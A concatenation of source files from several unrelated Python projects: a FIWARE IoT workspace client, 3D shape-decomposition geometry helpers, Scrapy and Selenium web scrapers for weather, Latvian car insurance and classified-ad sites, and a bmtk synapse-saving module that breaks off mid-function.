"a","name": "address","type": "string"},{"object_id": "lat","name": "latitude","type": "string"},{"object_id": "long","name": "longitude","type": "string"},{"object_id": "max","name": "maximumnumber", "type": "int"},{"object_id": "cur","name": "currentstatus","type": "int"}]}]}'%(device_id, workspace, entity, protocol, timezone) if self.requester.sendPostRequest(header, data, settings.workspace_api): print ("REGISTER DONE!") # curl "http://130.206.126.55:7896/iot/d?k=4jggokgpepnvsb2uv4s40d0000&i=112255" # -d 'n|cairo lib#a|5 ahmed zewil#lat|25.3#long|23.6#max|50' -H "Content-type: text/plain" header = {"Content-type": "text/plain"} data = 'n|%s#a|%s#lat|%s#long|%s#max|%s'%(workspace, address, long, lat, maxsize) try: self.requester.sendPostRequest(header, data, '%s?k=%s&i=%s'%(settings.device_api, apikey, device_id)) except: return False return True except: return False def listWorkspaces(self, service, workspaces): try: header = { "Content-type": "application/json", "Fiware-Service": service } values = [] for ws in workspaces: data = '{"entities": [{"type": "","id": "%s","isPattern": "false"}],"attributes": []}'%(ws) r = self.requester.sendPostRequest(header, data, settings.ngsi_api) val = json.loads(r) values.append({ws: val['contextResponses'][0]['contextElement']['attributes']}) #raise Exception(values) return values except: return False def 
updateDevices(self): return True def filterData(self, data, currentstatus=None, address=None, lat=None, long=None, maxsize=None): wss = [] #try: for el in data: for k,v in el.iteritems(): for attr in v: #raise Exception(attr.keys()[1]) if 'longitude' == attr[attr.keys()[1]]: long = attr['value'] if 'latitude' == attr[attr.keys()[1]]: lat = attr['value'] if 'maximumnumber' == attr[attr.keys()[1]]: maxsize = attr['value'] if 'address' == attr[attr.keys()[1]]: address = attr['value'] if 'currentstatus' == attr[attr.keys()[1]]: currentstatus = attr['value'] if currentstatus == u' ': currentstatus = 0 wss.append({ 'name':k, 'long': long, 'lat': lat, 'maxsize':maxsize, 'address':address, 'current': currentstatus }) return wss def updateWorkspaceData(self, service, ws_name, apikey, device_id, type='increment'): #try: header = { "Content-type": "application/json", "Fiware-Service": service } data = '{"entities": [{"type": "","id": "%s","isPattern": "false"}],"attributes": [ "currentstatus","maximumnumber" ]}'%(ws_name) r = self.requester.sendPostRequest(header, data, settings.ngsi_api) output = json.loads(r) currentstatus = 0 maximumnumber = 0 for attr in output['contextResponses'][0]['contextElement']['attributes']: if 'currentstatus' in attr['name']: currentstatus = attr['value'] if 'maximumnumber' in attr['name']: maximumnumber = attr['value'] if maximumnumber: #update current status # curl "http://130.206.126.55:7896/iot/d?k=4jggokgpepnvsb2uv4s40d0000&i=112255" -d 'cur|38' -H "Content-type: text/plain" header = {"Content-type": "text/plain"} if currentstatus == ' ': currentstatus=0 if type == 'increment': currentstatus = int(currentstatus) + 1 if currentstatus >= int(maximumnumber): currentstatus = int(maximumnumber) data = 'currentstatus|%d'%(int(currentstatus)) else: currentstatus = int(currentstatus) - 1 data = 'currentstatus|%d' % (currentstatus) if currentstatus <=0: data = 'currentstatus|0' domain = '%s?k=%s&i=%s'%(settings.device_api, apikey, device_id) self.requester.sendPostRequest(header, data, domain) return ({'maximumnumber': maximumnumber, 'currentstatus':currentstatus}) ``` #### File: app/fiware/service.py ```python import sys from fiware import Fiware class Service(): def __init__(self): self.fiware = Fiware() ``` #### File: wms/app/forms.py ```python from django import forms from .models import * class RegisterForm(forms.Form): iquery_choices = [(s.name, s.name) for s in Service.objects.all()] entity_name=forms.CharField(label="Workspace Name", widget = forms.TextInput(attrs = {"class":"form-control input-md"})) maxsize=forms.CharField(label="Max No. of spots", widget = forms.TextInput(attrs = {"class":"form-control input-md"})) location_long=forms.CharField(label="Location longitude", widget = forms.TextInput(attrs = {"class":"form-control input-md"})) location_lat = forms.CharField(label="Location latitude", widget=forms.TextInput(attrs={"class": "form-control input-md"})) address = forms.CharField(label="Address", widget=forms.TextInput(attrs={"class": "form-control input-md"})) services = forms.ChoiceField(iquery_choices,label="Service Name", widget=forms.Select(attrs={'class':'form-control input-md'})) def clean(self): cleaned_data=super(RegisterForm,self).clean() return cleaned_data class ServiceForm(forms.Form): name=forms.CharField(label="Service Name", widget = forms.TextInput(attrs = {"class":"form-control input-md"})) def clean(self): cleaned_data=super(ServiceForm,self).clean() return cleaned_data ```
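`registerWorkspace` and `updateWorkspaceData` both talk to the IoT Agent with plain-text `key|value` pairs joined by `#`, passing the API key and device id as the `k` and `i` query parameters. The snippet below rebuilds that payload and URL outside the class so the wire format is easy to inspect; the agent host is a placeholder, while the API key and device id are the sample values from the curl comments above.

```python
# Rebuilds the UL2.0-style payload sent to the IoT Agent; the host is a placeholder,
# the apikey/device_id are the sample values from the curl comments above.
device_api = 'http://iot-agent.example:7896/iot/d'
apikey = '4jggokgpepnvsb2uv4s40d0000'
device_id = '112255'

attributes = [('n', 'cairo lib'), ('a', '5 ahmed zewil'),
              ('lat', '25.3'), ('long', '23.6'), ('max', '50')]

payload = '#'.join('{}|{}'.format(key, value) for key, value in attributes)
url = '{}?k={}&i={}'.format(device_api, apikey, device_id)

print(url)
print(payload)  # n|cairo lib#a|5 ahmed zewil#lat|25.3#long|23.6#max|50
```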
{ "source": "aAbdz/cylindrical_shape_decomposition", "score": 3 }
#### File: cylindrical_shape_decomposition/CSD/coord_conv.py ```python import numpy as np def cart2pol(x,y): rho=np.sqrt(x**2+y**2) phi=np.arctan2(y,x) phi=phi*(180/np.pi) return(rho,phi) def pol2cart(rho, phi): phi=phi*(np.pi/180) x=rho*np.cos(phi) y=rho*np.sin(phi) return(x,y) ``` #### File: cylindrical_shape_decomposition/CSD/hausdorff_distance.py ```python import numpy as np from scipy.spatial.distance import directed_hausdorff def hausdorff_distance(curve1,curve2,n_sampling): s1=np.floor(np.linspace(0,len(curve1)-1,n_sampling)).astype(int) s2=np.floor(np.linspace(0,len(curve2)-1,n_sampling)).astype(int) u=curve1[s1] v=curve2[s2] curve_dist=max(directed_hausdorff(u, v)[0], directed_hausdorff(v, u)[0]) return curve_dist ``` #### File: cylindrical_shape_decomposition/CSD/plane_rotation.py ```python import numpy as np def rotate_vector(vector, rot_mat): "rotating a vector by a rotation matrix" rotated_vec = np.dot(vector,rot_mat) return rotated_vec def rotation_matrix_3D(vector, theta): """counterclockwise rotation about a unit vector by theta radians using Euler-Rodrigues formula: https://en.wikipedia.org/wiki/Euler-Rodrigues_formula""" a=np.cos(theta/2.0) b,c,d=-vector*np.sin(theta/2.0) aa,bb,cc,dd=a**2, b**2, c**2, d**2 bc,ad,ac,ab,bd,cd=b*c, a*d, a*c, a*b, b*d, c*d rot_mat=np.array([[aa+bb-cc-dd, 2*(bc+ad), 2*(bd-ac)], [2*(bc-ad), aa+cc-bb-dd, 2*(cd+ab)], [2*(bd+ac), 2*(cd-ab), aa+dd-bb-cc]]) return rot_mat def unit_normal_vector(vec1, vec2): n = np.cross(vec1, vec2) if np.array_equal(n, np.array([0, 0, 0])): n = vec1 s = max(np.sqrt(np.dot(n,n)), 1e-5) n = n/s return n def angle(vec1, vec2): theta=np.arccos(np.dot(vec1,vec2) / (np.sqrt(np.dot(vec1,vec1)) * np.sqrt(np.dot(vec2, vec2)))) return theta ``` #### File: cylindrical_shape_decomposition/CSD/polar_parametrization.py ```python import numpy as np from coord_conv import cart2pol, pol2cart def polar_parametrization(curve, c_mesh): r,phi = cart2pol(curve[:,1]-c_mesh,curve[:,0]-c_mesh) s=phi<0 s_inx=np.where(s)[0] s_inx=s_inx[np.argmin(abs(phi[s_inx]))] nphi=np.append(phi[s_inx:],phi[:s_inx]) nr=np.append(r[s_inx:],r[:s_inx]) for i in range(3): d_ang=np.diff(nphi) d_ang=np.append(nphi[0],d_ang) cw_direction=np.sign(d_ang)>=0 if sum(cw_direction)>(len(cw_direction)/2): 'error' else: cw_dir=np.where(cw_direction)[0] cw_dir=cw_dir[abs(d_ang[cw_direction])<350] nr=np.delete(nr,cw_dir) nphi=np.delete(nphi,cw_dir) sign_change=np.where((nphi[1:]*nphi[:-1])<0)[0] if len(sign_change)>1: over_st_point=np.where(nphi<nphi[0])[0] over_st_point=over_st_point[over_st_point>sign_change[1]] nr=np.delete(nr,over_st_point) nphi=np.delete(nphi,over_st_point) x,y=pol2cart(nr,nphi) curve=np.array([y+c_mesh,x+c_mesh]).T return curve ```
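A quick sanity check of the rotation helpers above (assuming `plane_rotation.py` is importable under that name): rotate the x-axis by +90 degrees about the z-axis. Note that `rotate_vector` multiplies the row vector on the left, which applies the transpose of the Euler-Rodrigues matrix, so the result lands on (0, -1, 0) rather than (0, 1, 0).

```python
import numpy as np
from plane_rotation import rotation_matrix_3D, rotate_vector

axis = np.array([0.0, 0.0, 1.0])           # unit rotation axis (z)
R = rotation_matrix_3D(axis, np.pi / 2.0)  # +90 degrees

v = np.array([1.0, 0.0, 0.0])              # the x-axis
rotated = rotate_vector(v, R)

# v is multiplied on the left (v . R), i.e. by the transpose of R,
# so the x-axis ends up on -y instead of +y.
print(np.round(rotated, 6))                # [ 0. -1.  0.]
```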
{ "source": "aabedi/weatherScraper", "score": 3 }
#### File: weatherScraper/spiders/weatherbot.py ```python from weatherScraper.items import TempData from weatherScraper.items import InputData import scrapy class WeatherbotSpider(scrapy.Spider): name = 'weatherbot' allowed_domains = ['www.wunderground.com'] start_urls = ['http://www.wunderground.com/history/'] def __init__(self, code='', month='', day='', year='', *args, **kwargs): # this will allow spider arguments super(WeatherbotSpider, self).__init__(*args, **kwargs) global user_input user_input = InputData() user_input['code'] = code user_input['month'] = month user_input['day'] = day user_input['year'] = year def parse(self, response): return scrapy.FormRequest.from_response( response, formnumber=1, # formnumber set to 1 because location and date are the second form on history page formdata={'code': user_input['code'], 'month': user_input['month'], 'day': user_input['day'], 'year': user_input['year']}, callback=self.after_post ) def after_post(self, response): # check input successful before moving on if "location you entered was not found" in response.body: self.logger.error("Location not valid") return temperatures = TempData() # Extract each temperature needed using corresponding css tags temperatures['actual_mean_temp'] = response.css('#historyTable tr:nth-child(2) .wx-value::text').extract() temperatures['avg_mean_temp'] = response.css('tr:nth-child(2) .indent~ td+ td .wx-value::text').extract() temperatures['actual_max_temp'] = response.css('tr:nth-child(3) .indent+ td .wx-value::text').extract() temperatures['avg_max_temp'] = response.css('#historyTable tr:nth-child(3) td:nth-child(3) .wx-value::text')\ .extract() temperatures['record_max_temp'] = response.css('tr:nth-child(3) td:nth-child(4) .wx-value::text').extract() temperatures['actual_min_temp'] = response.css('tr:nth-child(4) .indent+ td .wx-value::text').extract() temperatures['avg_min_temp'] = response.css('#historyTable tr:nth-child(4) td:nth-child(3) .wx-value::text')\ .extract() temperatures['record_min_temp'] = response.css('#historyTable tr:nth-child(4) td:nth-child(4) .wx-value::text')\ .extract() # Check if Fahrenheit or Celsius, then append correct unit if 'C' in response.css('tr:nth-child(3) .indent+ td .wx-unit::text'): for key, value in temperatures.iteritems(): value.append('C') else: for key, value in temperatures.iteritems(): value.append('F') yield temperatures ```
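Because the location code and date arrive as spider arguments, the spider can be launched from code as well as with `scrapy crawl weatherbot -a code=... -a month=...`. A minimal programmatic runner is sketched below; it assumes it is executed from inside the Scrapy project (so `get_project_settings` finds the settings module), and the location and date values are placeholders.

```python
# Programmatic runner; the location code and date are placeholders.
from scrapy.crawler import CrawlerProcess
from scrapy.utils.project import get_project_settings

from weatherScraper.spiders.weatherbot import WeatherbotSpider

process = CrawlerProcess(get_project_settings())
process.crawl(WeatherbotSpider, code='KSFO', month='7', day='4', year='2015')
process.start()  # blocks until the crawl finishes
```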
{ "source": "aabele/octa-latvija", "score": 3 }
#### File: aabele/octa-latvija/app.py ```python from __future__ import unicode_literals import random from flask import Flask from flask import render_template from flask import send_from_directory from flask.json import jsonify from flask_cache import Cache from scrapers import query_octa_providers DEBUG = True CACHE_PERIOD = 60 * 60 * 24 try: from local_settings import * except ImportError: pass app = Flask(__name__, static_url_path='/static') cache = Cache(app,config={'CACHE_TYPE': 'simple'}) def randint(): """ Select random integer between 00 and 99 :return: integer """ return random.randint(00, 99) def get_random_prices(): """ Generate random price array :return: array of prices|[] """ return ['%s.%s' % (randint(), randint()) for i in range(4)] @app.route('/api/provider-check/<provider>/<car_id>/<certificate_id>/', methods=['GET']) @cache.cached(timeout=CACHE_PERIOD) def fetch_prices(provider, car_id, certificate_id): """ Fetch the prices for specific car from specific provider :param provider: provider name|str :param car_id: car number|str :param certificate_id: certificate number|str :return: Array of results """ if DEBUG: data = get_random_prices() else: try: data = query_octa_providers(provider, car_id, certificate_id) except: data = [] return jsonify(data) @app.route('/', methods=['GET']) def front_page(): """ Render front page template :return: rendered contents """ return render_template('base.html') @app.route('/static/<path:path>', methods=['GET']) def send_static(path): """ Serve static content from /static directory :param path: asset path|str :return: """ return send_from_directory('static', path) if __name__ == "__main__": app.run() ``` #### File: octa-latvija/scrapers/__init__.py ```python from scrapers.providers.baltikums import BaltikumsOCTAScraper from scrapers.providers.compensa import CompensaOCTAScraper from scrapers.providers.gjensidige import GjensidigeOCTAScraper from scrapers.providers.if_company import IfOCTAScraper from scrapers.providers.seesam import SeesamOCTAScraper class_map = { 'baltikums': BaltikumsOCTAScraper, 'compensa': CompensaOCTAScraper, 'gjensidige': GjensidigeOCTAScraper, 'if_company': IfOCTAScraper, 'seesam': SeesamOCTAScraper } def query_octa_providers(provider, car_id, passport_id): """ :param provider: :param car_id: :param passport_id: :return: """ scraper_class = class_map.get(provider) if not scraper_class: raise Exception("Can't find such provider") scraper = scraper_class(car_id, passport_id) return scraper.get_data() ``` #### File: scrapers/providers/gjensidige.py ```python from __future__ import unicode_literals from scrapers.base import OCTAScraper class GjensidigeOCTAScraper(OCTAScraper): """ Gjensidige scraper class """ base_url = 'https://www.gjensidige.lv/pirkt-octa/online-service' car_id_xpath = '//input[@id="VehicleRegistrationNumber"]' passport_id_xpath = '//input[@id="VehicleRegCertificateNumber"]' submit_button_xpath = '//button[@class="btn next"]' results_loaded_text = '9 mēneši' def _parse_results(self): """ Parse website insurance offer details :return: list of containing prices [3months, 6months, 9months, 12months] """ response = [] items = self.driver.find_elements_by_xpath('//div[@id="packages"]//span[@style="font-size:18px;"]') for item in items: response.append(item.text.split(' ')[0].replace(',', '.')) return response ```
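With `DEBUG` enabled the `/api/provider-check/...` route skips scraping and returns four random prices, so the endpoint can be exercised without Selenium at all. A small sketch using Flask's test client follows; the car and certificate numbers are made up, and `resp.get_json()` assumes Flask 1.0 or newer (older versions would need `json.loads(resp.data)` instead).

```python
from app import app

client = app.test_client()
resp = client.get('/api/provider-check/baltikums/AB1234/AA0000000/')

print(resp.status_code)  # expected 200
print(resp.get_json())   # e.g. ['12.34', '56.78', '90.12', '34.56'] while DEBUG is True
```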
{ "source": "aabele/ssscraper", "score": 3 }
#### File: ssscraper/ssscraper/base.py ```python from __future__ import unicode_literals import random import string from selenium import webdriver from selenium.common import exceptions from selenium.webdriver.common.desired_capabilities import DesiredCapabilities # Phantom JS config phantomjs_config = dict(DesiredCapabilities.PHANTOMJS) phantomjs_params = ['--ignore-ssl-errors=true', '--ssl-protocol=any', '--web-security=false'] PHANTOMJS_EXECUTABLE_PATH = 'phantomjs' class Scraper(object): """ SS.lv scraper """ base_url = 'https://www.ss.lv' post_date_filter = { 1: 'Šodien', 2: 'Par 2 dienām', 5: 'Par 5 dienām' } def __init__(self): self.driver = webdriver.PhantomJS( PHANTOMJS_EXECUTABLE_PATH, desired_capabilities=phantomjs_config, service_args=phantomjs_params) self.driver.set_window_size(1024, 768) @staticmethod def random(length): """ Generate random string """ return ''.join(random.choice(string.ascii_letters) for i in range(length)) def get_categories(self): """ Get list of website top categories :return: [(title, url)], ...] :rtype: array """ self.driver.get(self.base_url) items = self.driver.find_elements_by_xpath('//table//a[@class="a1"]') return [(i.text, i.get_attribute('href')) for i in items] def get_subcategories(self, category_url): """ Get list of category sub categories :param category_url: top category url :type: string :return: [(title, url)], ...] :rtype: array """ self.driver.get(category_url) items = self.driver.find_elements_by_xpath('//table//a[@class="a_category"]') return [(i.text, i.get_attribute('href')) for i in items] def get_posts(self, subcategory_url, days=None): """ Get list of subcategory posts :param subcategory_url: top category url :type: string :param days: day filter - to filter posts by pub date :type: integer :return: [(title, url)], ...] 
:rtype: array """ if days and days not in self.post_date_filter: raise Exception('Please set valid day filter') self.driver.get(subcategory_url) if days: days_xpath = "//select[@id='today_cnt_sl']/option[starts-with(text(), '%s')]" % self.post_date_filter.get(days) self.driver.find_element_by_xpath(days_xpath).click() data = [] # Dealing with pagination # 1 vs True - because it's faster in python 2.* while 1: items = self.driver.find_elements_by_xpath('//table//a[@class="am"]') data += [(i.text, i.get_attribute('href')) for i in items] # Does not find next button at all - not enough items for pagination try: next_button = self.driver.find_element_by_xpath('//a[@class="navi" and @rel="next"]') except exceptions.NoSuchElementException: break if not next_button.get_attribute('href').endswith('/'): next_button.click() else: # Next button links back to the first page break return data def get_post_details(self, post_url): """ Get post details :param post_url: post url :type: string :return: post detail dictionary :rtype: dict """ data = {} self.driver.get(post_url) delimiter = self.random(10) # Fixing bad quality html self.driver.execute_script(''.join(( 'var delimiter = document.createTextNode("' + delimiter + '");', 'var table = document.getElementsByClassName("options_list")[0];', 'table.parentNode.insertBefore(delimiter, table);', ))) data['url'] = post_url body = self.driver.find_element_by_id('msg_div_msg').text data['body'] = body.split(delimiter)[0] # Properties keys = self.driver.find_elements_by_class_name('ads_opt_name') keys = [k.text.replace(':', '') for k in keys] values = self.driver.find_elements_by_class_name('ads_opt') values = [v.text for v in values] data['properties'] = dict(zip(keys, values)) # Photos data['photos'] = [] thumbs = self.driver.find_elements_by_class_name('pic_thumbnail') for thumb in thumbs: try: thumb.click() except exceptions.WebDriverException: pass image = self.driver.find_element_by_id('msg_img') data['photos'].append(image.get_attribute('src')) # Price data['price'] = self.driver.find_element_by_xpath('//td[@class="ads_price"]').text # Fixing bad quality html try: self.driver.execute_script('document.querySelectorAll("[align=left]")[0].className = "ads_contacts";') except exceptions.WebDriverException: pass # Contacts keys = [k.text for k in self.driver.find_elements_by_xpath('//td[@class="ads_contacts_name"]')] values = [v.text for v in self.driver.find_elements_by_xpath('//td[@class="ads_contacts"]')] data['contacts'] = list(zip(keys, values)) return data if __name__ == '__main__': scraper = Scraper() print(scraper.get_categories()) print(scraper.get_subcategories('https://www.ss.lv/lv/transport/')) print(scraper.get_posts('https://www.ss.lv/lv/agriculture/agricultural-machinery/motoblocks/')) print(scraper.get_post_details('https://www.ss.lv/msg/lv/agriculture/agricultural-machinery/motoblocks/bxlcof.html')) ```
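Putting the methods above together, a typical crawl goes category, then subcategory, then post list (optionally limited to the last 1, 2 or 5 days), and finally ad details. The sketch below extends the `__main__` block in the same module and reuses its example subcategory URL.

```python
scraper = Scraper()

# Posts from the last 2 days in one subcategory, then full details for the first hit.
subcategory = 'https://www.ss.lv/lv/agriculture/agricultural-machinery/motoblocks/'
posts = scraper.get_posts(subcategory, days=2)

if posts:
    title, url = posts[0]
    details = scraper.get_post_details(url)
    print(title, details['price'], len(details['photos']))
```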
{ "source": "aaberbach/bmtk", "score": 3 }
#### File: simulator/bionet/gids.py ```python import numpy as np from collections import namedtuple PopulationID = namedtuple('PopulationID', 'node_id population') class GidPool(object): def __init__(self): # map from pool-id --> gid self._accumulated_offset = 0 self._pool_offsets = {} # map from gid --> pop, node_id self._offsets = np.array([0], dtype=np.uint64) self._offset2pool_map = {} def add_pool(self, name, n_nodes): offset_index = len(self._offsets) self._offset2pool_map[offset_index] = name self._offsets = np.append(self._offsets, np.array([self._accumulated_offset + n_nodes], dtype=np.uint64)) self._pool_offsets[name] = self._accumulated_offset self._accumulated_offset += n_nodes def get_gid(self, name, node_id): return int(self._pool_offsets[name] + node_id) def get_pool_id(self, gid): offset_indx = np.searchsorted(self._offsets, gid, 'right') node_id = gid - self._offsets[offset_indx-1] pool_name = self._offset2pool_map[offset_indx] return PopulationID(int(node_id), pool_name) ``` #### File: bionet/modules/save_synapses.py ```python import os import csv import h5py import numpy as np from neuron import h from glob import glob from itertools import product from .sim_module import SimulatorMod from bmtk.simulator.bionet.biocell import BioCell from bmtk.simulator.bionet.io_tools import io from bmtk.utils.sonata.utils import add_hdf5_magic, add_hdf5_version from bmtk.simulator.bionet.pointprocesscell import PointProcessCell pc = h.ParallelContext() MPI_RANK = int(pc.id()) N_HOSTS = int(pc.nhost()) class SaveSynapses(SimulatorMod): def __init__(self, network_dir, single_file=False, **params): self._network_dir = network_dir self._virt_lookup = {} self._gid_lookup = {} self._sec_lookup = {} if MPI_RANK == 0: if not os.path.exists(network_dir): os.makedirs(network_dir) pc.barrier() #if N_HOSTS > 1: # io.log_exception('save_synapses module is not current supported with mpi') self._syn_writer = ConnectionWriter(network_dir) def _print_nc(self, nc, src_nid, trg_nid, cell, src_pop, trg_pop, edge_type_id): if isinstance(cell, BioCell): sec_x = nc.postloc() sec = h.cas() sec_id = self._sec_lookup[cell.gid][sec] # cell.get_section_id(sec) h.pop_section() self._syn_writer.add_bio_conn(edge_type_id, src_nid, src_pop, trg_nid, trg_pop, nc.weight[0], sec_id, sec_x) else: self._syn_writer.add_point_conn(edge_type_id, src_nid, src_pop, trg_nid, trg_pop, nc.weight[0]) def initialize(self, sim): io.log_info('Saving network connections. 
This may take a while.') # Need a way to look up virtual nodes from nc.pre() for pop_name, nodes_table in sim.net._virtual_nodes.items(): for node_id, virt_node in nodes_table.items(): self._virt_lookup[virt_node.hobj] = (pop_name, node_id) # Need to figure out node_id and pop_name from nc.srcgid() for node_pop in sim.net.node_populations: pop_name = node_pop.name for node in node_pop[0::1]: if node.model_type != 'virtual': self._gid_lookup[node.gid] = (pop_name, node.node_id) for gid, cell in sim.net.get_local_cells().items(): trg_pop, trg_id = self._gid_lookup[gid] if isinstance(cell, BioCell): # sections = cell._syn_seg_ix self._sec_lookup[gid] = {sec_name: sec_id for sec_id, sec_name in enumerate(cell.get_sections_id())} else: sections = [-1]*len(cell.netcons) for nc, edge_type_id in zip(cell.netcons, cell._edge_type_ids): src_gid = int(nc.srcgid()) if src_gid == -1: # source is a virtual node src_pop, src_id = self._virt_lookup[nc.pre()] else: src_pop, src_id = self._gid_lookup[src_gid] self._print_nc(nc, src_id, trg_id, cell, src_pop, trg_pop, edge_type_id) self._syn_writer.close() pc.barrier() if N_HOSTS > 1 and MPI_RANK == 0: merger = H5Merger(self._network_dir, self._syn_writer._pop_groups.keys()) pc.barrier() io.log_info(' Done saving network connections.') class H5Merger(object): def __init__(self, network_dir, grp_keys): self._network_dir = network_dir self._grp_keys = list(grp_keys) self._edge_counts = {(s, t): 0 for s, t in self._grp_keys} self._biophys_edge_count = {(s, t): 0 for s, t in self._grp_keys} self._point_edge_count = {(s, t): 0 for s, t in self._grp_keys} self._tmp_files = {(s, t): [] for s, t in self._grp_keys} for (src_pop, trg_pop), r in product(self._grp_keys, range(N_HOSTS)): fname = '.core{}.{}_{}_edges.h5'.format(r, src_pop, trg_pop) fpath = os.path.join(self._network_dir, fname) if not os.path.exists(fpath): io.log_warning('Expected file {} is missing'.format(fpath)) h5file = h5py.File(fpath, 'r') edges_grp = h5file['/edges/{}_{}'.format(src_pop, trg_pop)] self._tmp_files[(src_pop, trg_pop)].append(edges_grp) self._edge_counts[(src_pop, trg_pop)] += len(edges_grp['source_node_id']) self._biophys_edge_count[(src_pop, trg_pop)] += len(edges_grp['0/syn_weight']) self._point_edge_count[(src_pop, trg_pop)] += len(edges_grp['1/syn_weight']) for (src_pop, trg_pop), in_grps in self._tmp_files.items(): out_h5 = h5py.File(os.path.join(self._network_dir, '{}_{}_edges.h5'.format(src_pop, trg_pop)), 'w') add_hdf5_magic(out_h5) add_hdf5_version(out_h5) pop_root = out_h5.create_group('/edges/{}_{}'.format(src_pop, trg_pop)) n_edges_total = self._edge_counts[(src_pop, trg_pop)] n_edges_bio = self._biophys_edge_count[(src_pop, trg_pop)] n_edges_point = self._point_edge_count[(src_pop, trg_pop)] pop_root.create_dataset('source_node_id', (n_edges_total, ), dtype=np.uint64) pop_root['source_node_id'].attrs['node_population'] = src_pop pop_root.create_dataset('target_node_id', (n_edges_total, ), dtype=np.uint64) pop_root['target_node_id'].attrs['node_population'] = trg_pop pop_root.create_dataset('edge_group_id', (n_edges_total, ), dtype=np.uint16) pop_root.create_dataset('edge_group_index', (n_edges_total,), dtype=np.uint16) pop_root.create_dataset('edge_type_id', (n_edges_total, ), dtype=np.uint32) pop_root.create_dataset('0/syn_weight', (n_edges_bio, ), dtype=np.float) pop_root.create_dataset('0/sec_id', (n_edges_bio, ), dtype=np.uint64) pop_root.create_dataset('0/sec_x', (n_edges_bio, ), dtype=np.float) pop_root.create_dataset('1/syn_weight', (n_edges_point, ), 
dtype=np.float) total_offset = 0 bio_offset = 0 point_offset = 0 for grp in in_grps: n_ds = len(grp['source_node_id']) pop_root['source_node_id'][total_offset:(total_offset + n_ds)] = grp['source_node_id'][()] pop_root['target_node_id'][total_offset:(total_offset + n_ds)] = grp['target_node_id'][()] pop_root['edge_group_id'][total_offset:(total_offset + n_ds)] = grp['edge_group_id'][()] pop_root['edge_group_index'][total_offset:(total_offset + n_ds)] = grp['edge_group_index'][()] pop_root['edge_type_id'][total_offset:(total_offset + n_ds)] = grp['edge_type_id'][()] total_offset += n_ds n_ds = len(grp['0/syn_weight']) # print(grp['0/syn_weight'][()]) pop_root['0/syn_weight'][bio_offset:(bio_offset + n_ds)] = grp['0/syn_weight'][()] pop_root['0/sec_id'][bio_offset:(bio_offset + n_ds)] = grp['0/sec_id'][()] pop_root['0/sec_x'][bio_offset:(bio_offset + n_ds)] = grp['0/sec_x'][()] bio_offset += n_ds n_ds = len(grp['1/syn_weight']) pop_root['1/syn_weight'][point_offset:(point_offset + n_ds)] = grp['1/syn_weight'][()] point_offset += n_ds fname = grp.file.filename grp.file.close() if os.path.exists(fname): os.remove(fname) self._create_index(pop_root, index_type='target') self._create_index(pop_root, index_type='source') out_h5.close() def _create_index(self, pop_root, index_type='target'): if index_type == 'target': edge_nodes = np.array(pop_root['target_node_id'], dtype=np.int64) output_grp = pop_root.create_group('indices/target_to_source') elif index_type == 'source': edge_nodes = np.array(pop_root['source_node_id'], dtype=np.int64) output_grp = pop_root.create_group('indices/source_to_target') edge_nodes = np.append(edge_nodes, [-1]) n_targets = np.max(edge_nodes) ranges_list = [[] for _ in range(n_targets + 1)] n_ranges = 0 begin_index = 0 cur_trg = edge_nodes[begin_index] for end_index, trg_gid in enumerate(edge_nodes): if cur_trg != trg_gid: ranges_list[cur_trg].append((begin_index, end_index)) cur_trg = int(trg_gid) begin_index = end_index n_ranges += 1 node_id_to_range = np.zeros((n_targets + 1, 2)) range_to_edge_id = np.zeros((n_ranges, 2)) range_index = 0 for node_index, trg_ranges in enumerate(ranges_list): if len(trg_ranges) > 0: node_id_to_range[node_index, 0] = range_index for r in trg_ranges: range_to_edge_id[range_index, :] = r range_index += 1 node_id_to_range[node_index, 1] = range_index output_grp.create_dataset('range_to_edge_id', data=range_to_edge_id, dtype='uint64') output_grp.create_dataset('node_id_to_range', data=node_id_to_range, dtype='uint64') class ConnectionWriter(object): class H5Index(object): def __init__(self, file_path, src_pop, trg_pop): # TODO: Merge with NetworkBuilder code for building SONATA files self._nsyns = 0 self._n_biosyns = 0 self._n_pointsyns = 0 self._block_size = 5 self._pop_name = '{}_{}'.format(src_pop, trg_pop) # self._h5_file = h5py.File(os.path.join(network_dir, '{}_edges.h5'.format(self._pop_name)), 'w') self._h5_file = h5py.File(file_path, 'w') add_hdf5_magic(self._h5_file) add_hdf5_version(self._h5_file) self._pop_root = self._h5_file.create_group('/edges/{}'.format(self._pop_name)) self._pop_root.create_dataset('edge_group_id', (self._block_size, ), dtype=np.uint16, chunks=(self._block_size, ), maxshape=(None, )) self._pop_root.create_dataset('source_node_id', (self._block_size, ), dtype=np.uint64, chunks=(self._block_size, ), maxshape=(None, )) self._pop_root['source_node_id'].attrs['node_population'] = src_pop self._pop_root.create_dataset('target_node_id', (self._block_size, ), dtype=np.uint64, chunks=(self._block_size, ), 
maxshape=(None, )) self._pop_root['target_node_id'].attrs['node_population'] = trg_pop self._pop_root.create_dataset('edge_type_id', (self._block_size, ), dtype=np.uint32, chunks=(self._block_size, ), maxshape=(None, )) self._pop_root.create_dataset('0/syn_weight', (self._block_size, ), dtype=np.float, chunks=(self._block_size, ), maxshape=(None, )) self._pop_root.create_dataset('0/sec_id', (self._block_size, ), dtype=np.uint64, chunks=(self._block_size, ), maxshape=(None, )) self._pop_root.create_dataset('0/sec_x', (self._block_size, ), chunks=(self._block_size, ), maxshape=(None, ), dtype=np.float) self._pop_root.create_dataset('1/syn_weight', (self._block_size, ), dtype=np.float, chunks=(self._block_size, ), maxshape=(None, )) def _add_conn(self, edge_type_id, src_id, trg_id, grp_id): self._pop_root['edge_type_id'][self._nsyns] = edge_type_id self._pop_root['source_node_id'][self._nsyns] = src_id self._pop_root['target_node_id'][self._nsyns] = trg_id self._pop_root['edge_group_id'][self._nsyns] = grp_id self._nsyns += 1 if self._nsyns % self._block_size == 0: self._pop_root['edge_type_id'].resize((self._nsyns + self._block_size,)) self._pop_root['source_node_id'].resize((self._nsyns + self._block_size, )) self._pop_root['target_node_id'].resize((self._nsyns + self._block_size, )) self._pop_root['edge_group_id'].resize((self._nsyns + self._block_size, )) def add_bio_conn(self, edge_type_id, src_id, trg_id, syn_weight, sec_id, sec_x): self._add_conn(edge_type_id, src_id, trg_id, 0) self._pop_root['0/syn_weight'][self._n_biosyns] = syn_weight self._pop_root['0/sec_id'][self._n_biosyns] = sec_id self._pop_root['0/sec_x'][self._n_biosyns] = sec_x self._n_biosyns += 1 if self._n_biosyns % self._block_size == 0: self._pop_root['0/syn_weight'].resize((self._n_biosyns + self._block_size, )) self._pop_root['0/sec_id'].resize((self._n_biosyns + self._block_size, )) self._pop_root['0/sec_x'].resize((self._n_biosyns + self._block_size, )) def add_point_conn(self, edge_type_id, 